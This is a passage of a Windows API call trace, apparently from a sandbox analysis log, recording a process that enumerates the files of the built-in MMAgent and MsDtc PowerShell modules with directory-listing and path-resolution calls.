(dwNewMode=0x0, lpOldMode=0x1b7de460) returned 1 [0177.183] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de420) returned 1 [0177.183] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7de510) returned 1 [0177.183] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\MMAgent", nBufferLength=0x105, lpBuffer=0x1b7de000, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\MMAgent", lpFilePart=0x0) returned 0x3a [0177.183] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\MMAgent\\", nBufferLength=0x105, lpBuffer=0x1b7ddfa0, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\MMAgent\\", lpFilePart=0x0) returned 0x3b [0177.183] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\MMAgent\\*", lpFindFileData=0x1b7de1b0 | out: lpFindFileData=0x1b7de1b0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa386669, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa386669, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a592790 [0177.183] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa386669, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa386669, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0177.183] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4f14b8c7, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4f14b8c7, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4f14b8c7, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x24e, dwReserved0=0x0, dwReserved1=0x0, cFileName="MMAgent.psd1", cAlternateFileName="")) returned 1 [0177.184] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4f125661, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4f125661, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4f125661, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x19cb, dwReserved0=0x0, dwReserved1=0x0, cFileName="ps_mmagent_v1.0.cdxml", cAlternateFileName="")) returned 1 [0177.184] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0177.184] FindClose (in: hFindFile=0x1a592790 | out: hFindFile=0x1a592790) returned 1 [0177.184] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de460) returned 1 [0177.184] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de420) returned 1 [0177.184] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\MMAgent", nBufferLength=0x105, lpBuffer=0x1b7de100, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\MMAgent", lpFilePart=0x0) returned 0x3a [0177.184] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7de540) returned 1 [0177.184] GetFileAttributesExW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\MMAgent" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\mmagent"), fInfoLevelId=0x0, lpFileInformation=0x1b7de620 | out: lpFileInformation=0x1b7de620*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa386669, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa386669, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0177.184] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de500) returned 1 [0177.184] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7de570) returned 1 [0177.184] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\MMAgent", nBufferLength=0x105, lpBuffer=0x1b7de060, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\MMAgent", lpFilePart=0x0) returned 0x3a [0177.184] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\MMAgent\\", nBufferLength=0x105, lpBuffer=0x1b7de000, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\MMAgent\\", lpFilePart=0x0) returned 0x3b [0177.184] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\MMAgent\\*", lpFindFileData=0x1b7de210 | out: lpFindFileData=0x1b7de210*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa386669, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa386669, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a592790 [0177.185] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de260 | out: lpFindFileData=0x1b7de260*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa386669, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa386669, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0177.185] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de260 | out: lpFindFileData=0x1b7de260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4f14b8c7, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4f14b8c7, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4f14b8c7, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x24e, dwReserved0=0x0, dwReserved1=0x0, cFileName="MMAgent.psd1", cAlternateFileName="")) returned 1 [0177.185] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de260 | out: lpFindFileData=0x1b7de260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4f125661, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4f125661, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4f125661, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x19cb, dwReserved0=0x0, dwReserved1=0x0, cFileName="ps_mmagent_v1.0.cdxml", cAlternateFileName="")) returned 1 [0177.185] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de260 | out: lpFindFileData=0x1b7de260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4f125661, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4f125661, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4f125661, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x19cb, dwReserved0=0x0, dwReserved1=0x0, cFileName="ps_mmagent_v1.0.cdxml", cAlternateFileName="")) returned 0 [0177.185] FindClose (in: hFindFile=0x1a592790 | out: hFindFile=0x1a592790) returned 1 [0177.186] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de4c0) returned 1 [0177.186] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de480) returned 1 [0177.186] GetFileAttributesW (lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\MMAgent\\MMAgent.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\mmagent\\mmagent.psd1")) returned 0x20 [0177.186] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7de510) returned 1 [0177.186] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\MsDtc", nBufferLength=0x105, lpBuffer=0x1b7de000, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\MsDtc", lpFilePart=0x0) returned 0x38 [0177.186] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\MsDtc\\", nBufferLength=0x105, lpBuffer=0x1b7ddfa0, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\MsDtc\\", lpFilePart=0x0) returned 0x39 [0177.186] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\MsDtc\\*", lpFindFileData=0x1b7de1b0 | out: lpFindFileData=0x1b7de1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8fadd5, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8fadd5, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a592010 [0177.190] FindNextFileW (in: hFindFile=0x1a592010, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8fadd5, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8fadd5, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0177.190] FindNextFileW (in: hFindFile=0x1a592010, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbe8fadd5, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0xbe8fadd5, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8fadd5, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en", cAlternateFileName="")) returned 1 [0177.190] FindNextFileW (in: hFindFile=0x1a592010, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbe8fadd5, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0xbe8fadd5, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8fadd5, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 1 [0177.191] FindNextFileW (in: hFindFile=0x1a592010, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1a4b32f6, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x1a4b32f6, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x1a4b32f6, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1961, dwReserved0=0x0, dwReserved1=0x0, cFileName="MsDtc.Formats.ps1xml", cAlternateFileName="")) returned 1 [0177.191] FindNextFileW (in: hFindFile=0x1a592010, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1a48d09b, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x1a48d09b, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x1a48d09b, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1006, dwReserved0=0x0, dwReserved1=0x0, cFileName="MsDtc.psd1", cAlternateFileName="")) returned 1 [0177.191] FindNextFileW (in: hFindFile=0x1a592010, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1a4b32f6, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x1a4b32f6, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x1a4b32f6, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x843, dwReserved0=0x0, dwReserved1=0x0, cFileName="MsDtc.Types.ps1xml", cAlternateFileName="")) returned 1 [0177.191] FindNextFileW (in: hFindFile=0x1a592010, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1a4b32f6, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x1a4b32f6, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x1a4b32f6, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xcc4, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_DtcAdvancedHostSettingTask_v1.0.cdxml", cAlternateFileName="")) returned 1 [0177.191] FindNextFileW (in: hFindFile=0x1a592010, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1a4b32f6, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x1a4b32f6, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x1a4b32f6, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xef8, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_DtcAdvancedSettingTask_v1.0.cdxml", cAlternateFileName="")) returned 1 [0177.192] FindNextFileW (in: hFindFile=0x1a592010, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1a4b32f6, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x1a4b32f6, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x1a4b32f6, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x635, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_DtcClusterDefaultTask_v1.0.cdxml", cAlternateFileName="")) returned 1 [0177.192] FindNextFileW (in: hFindFile=0x1a592010, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1a48d09b, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x1a48d09b, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x1a48d09b, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x3ae0, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_DtcClusterTMMappingTask_v1.0.cdxml", cAlternateFileName="")) returned 1 [0177.192] FindNextFileW (in: hFindFile=0x1a592010, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1a48d09b, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x1a48d09b, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x1a48d09b, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x60f, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_DtcDefaultTask_v1.0.cdxml", cAlternateFileName="")) returned 1 [0177.192] FindNextFileW (in: hFindFile=0x1a592010, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1a48d09b, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x1a48d09b, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x1a4b32f6, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xe44, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_DtcLogTask_v1.0.cdxml", cAlternateFileName="")) returned 1 [0177.192] FindNextFileW (in: hFindFile=0x1a592010, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1a4b32f6, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x1a4b32f6, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x1a4b32f6, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x154d, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_DtcNetworkSettingTask_v1.0.cdxml", cAlternateFileName="")) returned 1 [0177.192] FindNextFileW (in: hFindFile=0x1a592010, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1a4b32f6, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x1a4b32f6, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x1a4b32f6, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x11ae, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_DtcTask_v1.0.cdxml", cAlternateFileName="")) returned 1 [0177.193] FindNextFileW (in: hFindFile=0x1a592010, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1a4b32f6, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x1a4b32f6, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x1a4b32f6, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x4d8, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_DtcTransactionsStatisticsTask_v1.0.cdxml", cAlternateFileName="")) returned 1 [0177.193] FindNextFileW (in: hFindFile=0x1a592010, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1a4b32f6, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x1a4b32f6, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x1a4b32f6, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xa84, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_DtcTransactionsTraceSessionTask_v1.0.cdxml", cAlternateFileName="")) returned 1 [0177.193] FindNextFileW (in: hFindFile=0x1a592010, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1a4b32f6, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x1a4b32f6, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x1a4b32f6, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xaa4, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_DtcTransactionsTraceSettingTask_v1.0.cdxml", cAlternateFileName="")) returned 1 [0177.193] FindNextFileW (in: hFindFile=0x1a592010, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1a4b32f6, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x1a4b32f6, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x1a4b32f6, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1766, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_DtcTransactionTask_v1.0.cdxml", cAlternateFileName="")) returned 1 [0177.193] FindNextFileW (in: hFindFile=0x1a592010, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1a4b32f6, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x1a4b32f6, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x1a4b32f6, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x6701, dwReserved0=0x0, dwReserved1=0x0, cFileName="TestDtc.psm1", cAlternateFileName="")) returned 1 [0177.194] FindNextFileW (in: hFindFile=0x1a592010, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1a4b32f6, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x1a4b32f6, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x1a4b32f6, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x6701, dwReserved0=0x0, dwReserved1=0x0, cFileName="TestDtc.psm1", cAlternateFileName="")) returned 0 [0177.194] FindClose (in: hFindFile=0x1a592010 | out: hFindFile=0x1a592010) returned 1 [0177.195] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de460) returned 1 [0177.195] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de420) returned 1 [0177.195] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7de510) returned 1 [0177.195] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\MsDtc", nBufferLength=0x105, lpBuffer=0x1b7de000, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\MsDtc", lpFilePart=0x0) returned 0x38 [0177.195] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\MsDtc\\", nBufferLength=0x105, lpBuffer=0x1b7ddfa0, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\MsDtc\\", lpFilePart=0x0) returned 0x39 [0177.195] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\MsDtc\\*", lpFindFileData=0x1b7de1b0 | out: lpFindFileData=0x1b7de1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8fadd5, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8fadd5, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a592790 [0177.196] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8fadd5, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8fadd5, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0177.196] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbe8fadd5, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0xbe8fadd5, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8fadd5, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en", cAlternateFileName="")) returned 1 [0177.196] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbe8fadd5, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0xbe8fadd5, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8fadd5, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 1 [0177.197] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1a4b32f6, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x1a4b32f6, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x1a4b32f6, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1961, dwReserved0=0x0, dwReserved1=0x0, cFileName="MsDtc.Formats.ps1xml", cAlternateFileName="")) returned 1 [0177.197] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1a48d09b, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x1a48d09b, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x1a48d09b, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1006, dwReserved0=0x0, dwReserved1=0x0, cFileName="MsDtc.psd1", cAlternateFileName="")) returned 1 [0177.197] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, 